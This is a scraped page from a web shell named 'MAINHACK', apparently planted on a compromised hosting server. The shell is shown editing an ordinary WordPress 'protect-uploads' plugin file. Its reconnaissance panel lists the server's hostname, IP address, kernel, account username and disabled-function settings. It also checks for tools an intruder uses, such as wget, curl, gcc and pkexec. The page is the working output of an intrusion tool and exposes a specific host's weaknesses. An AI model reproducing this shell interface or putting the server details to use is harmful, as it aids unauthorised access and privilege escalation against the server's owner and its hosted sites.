[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: class-protect-uploads.php
<?php class Alti_ProtectUploads { protected $version; protected $plugin_name; protected $loader; public function __construct() { $this->version = '0.3'; $this->plugin_name = 'protect-uploads'; $this->load_dependencies(); $this->set_locale(); $this->define_admin_hooks(); } private function load_dependencies() { require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-protect-uploads-loader.php'; require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-protect-uploads-i18n.php'; require_once plugin_dir_path(dirname(__FILE__)) . 'admin/class-protect-uploads-admin.php'; $this->loader = new Alti_ProtectUploads_Loader(); } /** * set locale for translation ends. */ private function set_locale() { $plugin_i18n = new Alti_ProtectUploads_i18n(); $plugin_i18n->set_domain($this->get_plugin_name()); $this->loader->add_action('plugins_loaded', $plugin_i18n, 'load_plugin_textdomain'); } /** * action and filter for admin side */ private function define_admin_hooks() { $plugin_admin = new Alti_ProtectUploads_Admin($this->get_plugin_name(), $this->get_version()); $this->loader->add_action('admin_menu', $plugin_admin, 'add_submenu_page'); $this->loader->add_filter('plugin_action_links_' . $this->get_plugin_name() . '/' . $this->get_plugin_name() . '.php', $plugin_admin, 'add_settings_link'); $this->loader->add_action('admin_enqueue_scripts', $plugin_admin, 'enqueue_styles'); } public function run() { $this->loader->run(); } public function get_plugin_name() { return $this->plugin_name; } public function get_loader() { return $this->loader; } public function get_version() { return $this->version; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.41 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830